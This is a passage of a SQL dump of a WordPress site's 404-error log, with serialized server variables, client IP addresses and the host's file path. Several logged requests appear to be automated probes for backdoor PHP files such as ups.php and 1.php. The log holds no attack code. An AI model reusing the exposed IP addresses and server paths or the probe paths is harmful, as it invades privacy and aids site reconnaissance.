Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631959121.91841888427734375;s:12:\"REQUEST_TIME\";i:1631959121;}}','notice','2021-09-18 09:58:44','2021-09-18 09:58:42',72692024,72775688,'http://zphiblgz.org/wordpress/autoload_classmap.php',1,0,'185.182.56.216'),(97211,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631959123.5506389141082763671875;s:12:\"REQUEST_TIME\";i:1631959123;}}','notice','2021-09-18 09:58:44','2021-09-18 09:58:43',72312456,72396120,'http://zphiblgz.org/wordpress/autoload_classmap.php',1,0,'185.182.56.216'),(97212,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631961967.1175849437713623046875;s:12:\"REQUEST_TIME\";i:1631961967;}}','notice','2021-09-18 10:46:09','2021-09-18 10:46:07',72604576,72688344,'http://zphiblgz.org/wordpress/',1,0,'68.65.121.137'),(97213,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.2\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.13 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631964759.0832459926605224609375;s:12:\"REQUEST_TIME\";i:1631964759;}}','notice','2021-09-18 11:32:41','2021-09-18 11:32:39',72605448,72689192,'http://zphiblgz.org/contact/',1,0,'192.186.145.59'),(97214,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631969608.4873180389404296875;s:12:\"REQUEST_TIME\";i:1631969608;}}','notice','2021-09-18 12:53:30','2021-09-18 12:53:28',72724192,72807176,'https://zphiblgz.org/scholarship/application/',1,0,'37.123.163.58'),(97215,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631969651.2226541042327880859375;s:12:\"REQUEST_TIME\";i:1631969651;}}','notice','2021-09-18 12:54:13','2021-09-18 12:54:11',72163984,72248024,'http://zphiblgz.org/tag/%E8%B2%AB%E3%81%8B%E3%82%8C%E3%81%9F%E5%BF%83%E8%87%93%E3%81%AE%E5%91%AA%E3%81%84/',1,0,'66.249.65.165'),(97216,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631971951.3529369831085205078125;s:12:\"REQUEST_TIME\";i:1631971951;}}','notice','2021-09-18 13:32:33','2021-09-18 13:32:31',72650512,72749200,'https://zphiblgz.org/assets/images/1.php',1,0,'185.191.34.215'),(97217,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631975314.14317798614501953125;s:12:\"REQUEST_TIME\";i:1631975314;}}','notice','2021-09-18 14:28:36','2021-09-18 14:28:34',72623360,72707096,'http://zphiblgz.org/wordpress/2index.php',1,0,'187.45.195.16'),(97218,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631975318.6128799915313720703125;s:12:\"REQUEST_TIME\";i:1631975318;}}','notice','2021-09-18 14:28:40','2021-09-18 14:28:38',72605224,72688960,'http://zphiblgz.org/wordpress/2index.php',1,0,'187.45.195.16'),(97219,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631983387.0890080928802490234375;s:12:\"REQUEST_TIME\";i:1631983387;}}','notice','2021-09-18 16:43:09','2021-09-18 16:43:07',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'5.180.243.195'),(97220,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631990220.988831043243408203125;s:12:\"REQUEST_TIME\";i:1631990220;}}','notice','2021-09-18 18:37:03','2021-09-18 18:37:01',72623584,72707320,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(97221,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:74:\"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631990909.24816799163818359375;s:12:\"REQUEST_TIME\";i:1631990909;}}','notice','2021-09-18 18:48:31','2021-09-18 18:48:29',72666480,72766576,'http://zphiblgz.org/var/cache/mage--2/',1,0,'74.91.8.36'),(97222,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631991875.7458178997039794921875;s:12:\"REQUEST_TIME\";i:1631991875;}}','notice','2021-09-18 19:04:37','2021-09-18 19:04:36',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.20'),(97223,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631993715.3191139698028564453125;s:12:\"REQUEST_TIME\";i:1631993715;}}','notice','2021-09-18 19:35:17','2021-09-18 19:35:15',72605384,72689152,'http://zphiblgz.org/application',1,0,'107.21.84.17'),(97224,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632007522.45096588134765625;s:12:\"REQUEST_TIME\";i:1632007522;}}','notice','2021-09-18 23:25:24','2021-09-18 23:25:22',72168848,72256112,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97225,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632009884.543827056884765625;s:12:\"REQUEST_TIME\";i:1632009884;}}','notice','2021-09-19 00:04:46','2021-09-19 00:04:44',72605136,72688888,'http://zphiblgz.org/wordpress/ups.php',1,0,'103.146.22.52'),(97226,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632009888.5100800991058349609375;s:12:\"REQUEST_TIME\";i:1632009888;}}','notice','2021-09-19 00:04:50','2021-09-19 00:04:48',72605136,72688888,'http://zphiblgz.org/wordpress/ups.php',1,0,'103.146.22.52'),(97227,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632011217.03569507598876953125;s:12:\"REQUEST_TIME\";i:1632011217;}}','notice','2021-09-19 00:26:59','2021-09-19 00:26:57',72144880,72228072,'https://zphiblgz.org/event/ladiez-real-talk-empowerment-summit/',1,0,'40.77.167.66'),(97255,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.44 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632094653.79640102386474609375;s:12:\"REQUEST_TIME\";i:1632094653;}}','notice','2021-09-19 23:37:35','2021-09-19 23:37:34',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'188.126.79.23'),(97256,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632097694.0750200748443603515625;s:12:\"REQUEST_TIME\";i:1632097694;}}','notice','2021-09-20 00:28:16','2021-09-20 00:28:14',72162640,72245832,'https://zphiblgz.org/event/ladiez-real-talk-empowerment-summit/',1,0,'40.77.167.66'),(97257,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:1:\"9\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632099257.631175994873046875;s:12:\"REQUEST_TIME\";i:1632099257;}}','notice','2021-09-20 00:54:19','2021-09-20 00:54:17',72628312,72712944,'https://zphiblgz.org/beck/cron.php',1,0,'185.191.34.215'),(97258,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632099669.7677299976348876953125;s:12:\"REQUEST_TIME\";i:1632099669;}}','notice','2021-09-20 01:01:11','2021-09-20 01:01:10',72604576,72688344,'http://zphiblgz.org/wordpress/',1,0,'72.47.224.18'),(97298,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632180557.0881869792938232421875;s:12:\"REQUEST_TIME\";i:1632180557;}}','notice','2021-09-20 23:29:19','2021-09-20 23:29:17',72186608,72273872,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97188,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631928463.4999558925628662109375;s:12:\"REQUEST_TIME\";i:1631928463;}}','notice','2021-09-18 01:27:45','2021-09-18 01:27:43',72623208,72706944,'http://zphiblgz.org/scholarship/application/',1,0,'185.112.102.105'),(97189,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4089.0 